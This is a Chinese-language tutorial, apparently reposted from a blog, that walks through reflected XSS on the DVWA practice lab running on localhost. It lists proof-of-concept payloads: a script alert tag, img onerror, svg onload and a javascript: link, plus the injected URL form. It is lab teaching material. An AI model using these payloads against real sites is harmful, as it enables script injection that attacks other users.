欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 房产 > 家装 > XSS (Reflected)-反射型XSS

XSS (Reflected)-反射型XSS

2025/6/14 7:16:04 来源:https://blog.csdn.net/weixin_43435891/article/details/148627176  浏览:    关键词:XSS (Reflected)-反射型XSS

📍 路径

访问:

http://localhost:8080/vulnerabilities/xss_r/

你会看到一个简单的表单,只有一个输入框,提示类似:

What’s your name?

🧪 Step 1:输入测试 Payload

在输入框里输入:

<script>alert('XSS')</script>

然后点击 Submit。

✅ 预期效果:
页面会刷新,同时浏览器会弹出一个提示框,显示内容为 XSS。
在这里插入图片描述

在这里插入图片描述

🔁 Step 2:确认漏洞是“反射型”

反射型 XSS 的特征是——你注入的脚本被立即反射回页面,例如你访问:

http://localhost:8080/vulnerabilities/xss_r/?name=<script>alert('XSS')</script>

你会发现你的输入直接出现在页面上,说明页面未做过滤/编码处理。
在这里插入图片描述

💡 Step 3:尝试其他 Payload

有些浏览器或安全等级会拦截

图片 onerror:

<img src=x onerror=alert('XSS')>

在这里插入图片描述

SVG onload:

<svg/onload=alert('XSS')>

在这里插入图片描述

JS URL 方案(有时配合链接):

<a href="javascript:alert('XSS')">Click me</a>

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词